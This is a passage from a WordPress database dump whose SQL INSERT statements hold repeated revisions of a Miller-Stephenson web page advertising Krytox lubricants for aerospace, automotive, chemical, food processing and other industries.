<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 17:14:14', '2016-09-28 17:14:14', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2093, 2, '2016-09-28 17:14:47', '2016-09-28 17:14:47', '[button size="medium" style="primary" text="<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Automotive—Mechanical Systems</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Box Board Corrugating</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Chemical and Petrochemical</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Electronics/Semiconductor</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Food Processing</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Medical Industry Equipment Applications</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Metal Processing</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Oxygen and Reactive Gas Service</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Power Generation</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Pulp and Paper</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Textile</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Tire Mold</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 17:14:47', '2016-09-28 17:14:47', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2094, 2, '2016-09-28 17:15:33', '2016-09-28 17:15:33', '[button size="medium" style="primary" text="<strong>Automotive—Squeek &amp; Rattle</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Automotive—Mechanical Systems</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Box Board Corrugating</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Chemical and Petrochemical</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Electronics/Semiconductor</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Food Processing</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Medical Industry Equipment Applications</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Metal Processing</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Oxygen and Reactive Gas Service</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Power Generation</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Pulp and Paper</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Textile</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n[button size="medium" style="primary" text="<strong>Tire Mold</strong>" link="https://" target=""]\r\n\r\n&nbsp;\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical 